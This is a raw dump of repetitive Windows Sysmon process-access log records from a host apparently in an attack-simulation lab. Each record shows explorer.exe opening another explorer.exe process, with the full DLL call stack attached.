16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241086Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241085Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241084Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241083Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241082Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241081Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241080Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241079Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241078Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241077Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241076Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241075Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241074Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241073Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241072Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241071Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241070Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241069Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241068Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241067Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241066Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241065Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241064Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241063Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241062Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241061Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241060Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241059Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 